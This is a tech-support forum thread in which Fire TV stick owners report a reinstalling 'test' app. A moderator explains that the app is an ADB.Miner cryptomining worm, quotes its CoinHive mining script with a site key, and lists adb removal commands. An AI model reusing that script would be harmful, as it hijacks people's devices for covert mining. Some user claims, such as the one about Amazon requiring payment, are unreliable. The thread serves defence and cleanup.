[Malware/Virus] Solution Inside - Firestick Gen 2 - "test" app keeps popping up

[the great potato]

[Malware/Virus] Solution Inside - Firestick Gen 2 - "test" app keeps popping up

hi guys ! i have a question i hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called "test" keeps popping up at all times, i have no clue why its doing this. I have uninstalled the app and it comes back and ive even tryed to run the app and its tells me the App needs updated to run on my device, look for an updated version on my store.. and yeah the app dont exist on the store.. What is up with this thing? I even reformated the firestick and within a few hours it was back and doing it again !!!! this thing is driving me nuts !!! youll be watching a video or movie and this thing pops up and forces your video to pause and even crash. Can anyone help me?? i only have Terrarium,Turbo vpn,es file explorer, mouse toggle, and SPMC installed. the rest is all from Amazons factory reset. I just want to block it from running or destroy it completely. you dont even have to be doing anything and it pops up even on the Homescreen. ANyhelp would be great thank you all !! btw.. ran a virus scan it said it deleted it and it came back, tryed a firewall blocked it ,,still keeps popping up !! AURG!! help !!

------------------------------------------------------------------Moderator Edit-------------------------------------------------------------------
Verified Solution​

First reported by @azureru as malware in this post.

I have the same app on my Android Stick and it kept coming back.

Reverse engineering it - that Test app is a variation of ADB.Miner worm that will use your device to open webview. It open single html that will mine monero using CoinHive

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{
        threads:3,
        throttle: 0.6
});
	miner.start();
</script>

If you have uninstall the app on your Android and it kept coming back - make sure to disable adb on your Android and check for other Android devices on your network for this worm.

------------------------------------------------------------------------------------------


@innovaciones provides a number of solutions - including a verified working modded .apk of the malware which renders it harmless.

I can confirm that this "Test" app is actually a virus, I reverse engineering it too and when the Test apk auto starts it opens an script from a "run.html" file that have the same code that azureru posted, so this is definitely an ADB.Miner, how we got the virus? well I guess from sideloading sketchy apps, the main problem with this virus is that the Fire TV gets very slow because most of the performance is used for mining.

How we can get rid of this virus?
Well first, is there other Fire TVs or Android devices in your place? if the answer is yes then these devices could be infected too, this virus spreads using the ADB protocol so all the devices that have "ADB debugging" option enabled that are connected in your wifi network will get the virus, so is very important that you turn off "ADB debugging" in all your Android devices.

RESET TO FACTORY SETTINGS
There a several ways to get rid of this virus, the most effective way will be reseting to factory settings all your devices, and be careful next time what apk you install, and don't forget to turn off ADB debugging when not in use.

DELETE VIRUS FILES
Using ADB input these commands:

shell rm data/local/tmp/ufo.apk
shell rm data/local/tmp/lock.txt
shell rm data/local/tmp/smi
shell rm data/local/tmp/endat
shell rm data/local/tmp/nohup
uninstall com.google.time.timer
reboot

This are some of the virus files I found but I really don't know if deleting these files will be enough to disable the virus.

INSTALL MODDED VIRUS
If you don't want to reset to factory settings and all you want is to "turn off" the miner then you can install the attached APK that is a modded version from the original virus except the run.html is a blank page (without the minning script) and the Activities name from the AndroidManifest.xml were changed so it can't start now, so pretty much the virus will think it's working but it's not.

HIDE THE VIRUS
As recommended here you could try the hide command:
pm hide com.google.time.timer

Here is more information about these kind of virus, the test virus a variation from this:
http://blog.netlab.360.com/adb-miner-more-information-en/

I hope this information could help someone.

 

[the great potato]

the test app just has a White screen, and in the top left corner has a Green Android bot and the word test.. can get a pic if needed.

 

[the great potato]

o i should say, ive googled and searched and searched for info on this and apparently im the only person in the world this is happening to

 

[the great potato]

ok i looked at the test app in the firewall and it has more info, it says its from, com.google.time.timer , so what does that mean? is it a file from google that messed up ??

 

[the great potato]

hmmm. Ok i installed nox 6 emulater and installed all the same apps and so far this com.google.time.timer does not exist ! thought maybe i could track down some info on this if i installed it on my pc, someone got any ideas here???

 

[the great potato]

ok someone has to know something here, just got off the phone with amazon tech, they told me "test" keeps popping up because i have a trial amazon account and i have to pay for amazon service !! say what?? I dont even use the firestick for amazon service !! guess its time to root and take out the amazon services then?

 

[the great potato]

well so far i made a new account with my other email and deregistered my firestick off my account and put it on the new account. Let yall know what happens.

 

[the great potato]

so far the test app hasent popped up at all. So according to amazon, you have to pay to just use this firestick.. i guess running there adds on the homepage to make them money isnt enough, you have to pay to keep using it. but ok, just keep making new accounts and linking the firestick to the new accounts will solve this problem i guess. So if anyone ever has this problem besides me, thats the answer ! thanks everyone.

 

[TheFixItMan]

so far the test app hasent popped up at all. So according to amazon, you have to pay to just use this firestick.. i guess running there adds on the homepage to make them money isnt enough, you have to pay to keep using it. but ok, just keep making new accounts and linking the firestick to the new accounts will solve this problem i guess. So if anyone ever has this problem besides me, thats the answer ! thanks everyone.

No you don't have to pay to use the firestick - you probably signed up for free 30 day prime subscription - once that runs out it will automatically charge you for the subscription unless you cancel (if there is an available payment option on your account)
I assume all you had to do if it was prime membership was to cancel your subscription

Of course you don't have to opt in for this at all during registration

You can simply remove apps via adb

The firestick doesn't come with any Google apps (for obvious reasons) so anything else that is popping up is from something you have installed

 

[the great potato]

well, after 2 days the test is popping up again ! =*( but anyway, I know i dont have any trials of anything especially prime, i had problems with Prime before and i make sure and double check i have nothing to do with prime. Amazon tech are the ones that told me if i pay 19.99 a month or 60 for 5 months it will stop ! So i have no idea what there talking about. I can only think to uninstall apps 1 by 1 and see if it stops or not. Im really getting to a loss on this and considering selling my set up on ebay and just buying one of the 100 dollar android boxes. =( thank you much for your reply !! All i can guess it is something installed, but wth is amazon talking about ? lol

 

[the great potato]

talked to amazon, though my account said , you have no prime sub, sign up now! they said i had a prime sub trial ... canceled it and still get the pop up !

 

[vSyndrome]

talked to amazon, though my account said , you have no prime sub, sign up now! they said i had a prime sub trial ... canceled it and still get the pop up !

i signed up for an account on this message board just for this thread.

Same thing is happening to me!!

Its driving me bonkers. I did a factory reset and everything. Its an app called "test" that will re-install itself even after deletion. I've tried installing an antivirus/malware app on the firestick, but none of the apps work properly on it. How is there not a proper antivirus app for firestick yet? Seems odd.

Let's see if we can crack this thing together. I'll send you a PM as well.

 

[the great potato]

Omg in not alone in the world !!!! Thank you!!!!!!!!!!

 

[the great potato]

indeed ive tied many antivirus apps and one picked it up and said its a MED virus , deleted it and it reinstalled

 

[Kbaker2001]

I am also having this problem. Please let me know how you fix t. I have a prime account and Amazon is no help

 

[bsdobson]

I'm having the same issue. Asked on reddit and waiting on some answers.

 

[thafundamental]

Same here

Just started a few weeks ago. When did it start for you guys?

 

[acsterf]

Same problem here, started few weeks ago, factory reset won't work, disabling ADB and untrusted sources neither, it keeps reinstalling. Maybe if it is a virus it can be hidden in the sd card?

 

[Abrown3mtg]

Me too....

Both of my firesticks began having this issue recently. I also found the app called "test" that will not uninstall. It's driving me insane. It pauses video on Amazon prime every 10 minutes or so and completely exits streams if I'm using kodi. Has anyone found a solution yet?

I found a thread an Reddit but all the posts and responses had been deleted. :/

 

[Prima2339]

Same problem with my Firestick

I'm experiencing the exact same issue! Constant interruptions whatever I'm watching every 10 -20 mins. Blank white screen with little green android robot in upper left corner says "Test". This just recently (2-3 wks) started happening! I've been using firesticks since Nov/17. One of my firesticks recently crashed and Amazon is sending me a new one; can't wait to see if the new firestick has this "Test" crap on it too!? I'm not a Prime member, and have never accepted a trial membership either. I only use firestick for Kodi, Netflix, and Youtube videos. I don't use any of the Amazon $ services.
I'm so happy to find your post, thought I was the only one! Hopefully we can figure this out and get back to watching without interruptions! :fingers-crossed: